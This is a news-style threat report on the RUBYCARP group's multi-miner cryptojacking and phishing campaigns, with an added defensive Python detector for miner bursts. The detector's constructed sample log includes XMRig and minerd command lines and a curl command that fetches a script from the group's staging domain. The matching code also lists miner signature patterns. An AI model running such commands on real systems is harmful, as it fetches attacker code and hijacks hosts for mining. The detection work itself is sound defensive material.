A recent research study has uncovered and detailed the decade-long activities of a Romanian cyber threat group, RUBYCARP, which relies on cryptocurrency mining and phishing. Based on reports, the primary feature of the campaign is the threat actors’ use of a script that can deploy multiple cryptocurrency miners at the same time.
By executing these miners at once, RUBYCARP reduces both the time required for the attack and the chances of detection. The script primarily deploys XMRig/Monero miners and was previously hosted on a now-defunct domain, “download[.]c3bash[.]org.”
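The multi-miner launch described above is also what makes the activity detectable: several miner processes started within seconds by the same parent is an unusual pattern on a legitimate host. The following is an added example (not code from the report or from RUBYCARP) that scans a constructed process-accounting log for that burst pattern and for references to the refanged staging domain named above; the log format, the one-minute window and the pool hostnames are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators from the report: XMRig/Monero miner tooling and the now-defunct
# staging domain (refanged here so it can be matched against real log lines).
MINER_PATTERNS = [r"\bxmrig\b", r"stratum\+tcp://", r"--donate-level", r"\bminerd\b"]
STAGING_DOMAIN = "download.c3bash.org"
WINDOW = timedelta(seconds=60)  # assumption: "simultaneous" means within one minute

# Constructed sample log (not real data): "timestamp host ppid pid command".
SAMPLE_LOG = """\
2024-04-01T10:00:01 web01 4110 4121 /tmp/.x/xmrig -o stratum+tcp://pool.example:3333 -k
2024-04-01T10:00:02 web01 4110 4122 /tmp/.x/minerd -a cryptonight -o stratum+tcp://pool2.example:4444
2024-04-01T10:00:03 web01 4110 4123 /tmp/.x/xmrig --donate-level 0 -o stratum+tcp://pool3.example:5555
2024-04-01T10:00:05 web01 4110 4124 curl -s http://download.c3bash.org/x.sh
2024-04-01T12:30:00 db02 1 5001 /usr/bin/xmrig -o stratum+tcp://pool.example:3333
2024-04-01T13:00:00 db02 1 5002 /usr/bin/python3 backup.py
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\d+) (\d+) (.*)$")

def parse(log):
    """Yield (timestamp, host, ppid, pid, command) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, host, ppid, pid, cmd = m.groups()
            yield datetime.fromisoformat(ts), host, int(ppid), int(pid), cmd

def is_miner(cmd):
    return any(re.search(p, cmd, re.I) for p in MINER_PATTERNS)

def find_multi_miner_bursts(log, window=WINDOW):
    """Return {(host, ppid): [pids]} for parents spawning 2+ miners within `window`."""
    by_parent = defaultdict(list)
    for ts, host, ppid, pid, cmd in parse(log):
        if is_miner(cmd):
            by_parent[(host, ppid)].append((ts, pid))
    bursts = {}
    for key, procs in by_parent.items():
        procs.sort()
        first = procs[0][0]
        pids = [pid for ts, pid in procs if ts - first <= window]
        if len(pids) >= 2:  # a lone miner (db02 above) is left for other rules
            bursts[key] = pids
    return bursts

def find_staging_domain_hits(log, domain=STAGING_DOMAIN):
    """PIDs whose command line references the staging domain."""
    return [pid for _, _, _, pid, cmd in parse(log) if domain in cmd.lower()]
```

On the sample, the web01 parent is flagged for three miners launched within two seconds, while the single long-running miner on db02 is deliberately not matched by the burst rule.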
Further evidence shows that RUBYCARP also conducts phishing operations to steal valuable financial assets, including credit card numbers.
The RUBYCARP threat group has executed a phishing campaign that targeted Danish users.
According to investigations, the RUBYCARP threat group utilised a phishing template and impersonated the logistics company Bring to target Danish users. Moreover, researchers identified a PHP script named “ini.inc,” which the hackers used as a tool for sending these phishing emails, with compromised email accounts linked to the attacks.
Further analysis of the group’s activities also revealed various tools and techniques, including specific commands within shell bot code for sending phishing emails. The researchers also found evidence of a potential phishing landing page targeting European entities, including Swish Bank and Nets Bank.
The study also highlights RUBYCARP’s involvement in developing and selling cyber weapons. Separate research noted that attribution for these campaigns is difficult; still, the attackers are most likely Romanian and may have some affiliation with the ‘Outlaw APT’ group and others who leverage the Perl ShellBot. These researchers likewise concluded that the threat actors are involved in developing and selling cybercriminal tools.
Security experts say communication among the threat actors has remained generally consistent over the years. Additionally, the community dynamic within RUBYCARP is noteworthy, as it involves mentoring newcomers to the cybercriminal community. This tactic also offers the group a financial advantage, as it can later sell its toolset to the trainees it tutors.
The cooperation of some threat actors with other groups has been an integral part of their cybercriminal activities. This teamwork should remind organisations and threat researchers that sharing intelligence with one another benefits everyone in preventing such attacks.